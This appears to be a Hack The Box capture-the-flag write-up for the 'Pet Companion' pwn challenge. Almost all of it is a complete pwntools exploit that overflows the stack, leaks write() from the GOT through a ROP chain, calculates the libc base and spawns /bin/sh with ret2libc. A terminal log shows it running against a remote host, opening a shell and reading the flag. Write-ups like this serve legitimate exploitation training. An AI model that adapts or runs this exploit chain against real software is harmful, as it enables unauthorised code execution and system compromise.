# Pet Companion

{% file src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FKAJj9GrvmPvJLpWTYKdo%2Fpwn_pet_companion.zip?alt=media&token=1010aeba-232c-43c6-b39f-795c102c915f" %}

### <mark style="color:blue;">Challenge Description:</mark>

```
Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.
```

### <mark style="color:red;">Exploit.py:</mark>

```python
import sys

from pwn import *


def start(argv=[], *a, **kw):
    if args.GDB:  # Debug under GDB with the gdbscript set below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # python exploit.py REMOTE <server> <port>
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# GDB commands to run when started with the GDB argument (empty by default)
gdbscript = ''

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library shipped with the challenge (same build as the remote target)
libc = ELF('libc.so.6')

# Bytes of input needed to reach the saved return address
offset = 72

# Start program
io = start()

# ROP gadgets found with ropper; the binary is not position-independent,
# so these addresses are fixed
ret = 0x4004de      # ret (not needed in this chain)
pop_rdi = 0x400743  # pop rdi; ret
pop_rsi = 0x400741  # pop rsi; pop r15; ret

# Stage 1: leak the libc address of write() via write(fd, buf, count).
# rsi (buf) is pointed at write's GOT entry so its resolved address is
# printed; the gadget also pops r15, so a second copy of the GOT address
# is supplied as filler. rdi (fd) and rdx (count) are left as the
# program's own earlier write() call set them. Returning into main()
# afterwards lets us overflow a second time.
payload = flat({
    offset: [
        pop_rsi,
        elf.got.write,   # rsi = &GOT[write]
        elf.got.write,   # r15 = filler
        elf.plt.write,   # write(fd, &GOT[write], count)
        elf.symbols.main
    ]
})

# Send the payload
io.sendlineafter(b'status: ', payload)

# Skip the three lines the program prints before the leaked bytes
io.recvline()
io.recvline()
io.recvline()

# The first 6 bytes are the address; pad to 8 bytes for unpack()
got_write = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)

# Subtract write's offset in libc to get the libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)

# Resolve system() and a "/bin/sh" string in the leaked libc
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Stage 2: ret2libc system("/bin/sh") on the second pass through main()
payload = flat({
    offset: [
        pop_rdi,
        bin_sh,
        libc.symbols.system
    ]
})

# Send the payload
io.sendline(payload)

# Got Shell?
io.interactive()
```

```bash
┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode

[*] Configuring...

$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$  
```

### <mark style="color:red;">Flag.txt:</mark>

```bash
HTB{c0nf1gur3_w3r_d0g}
```
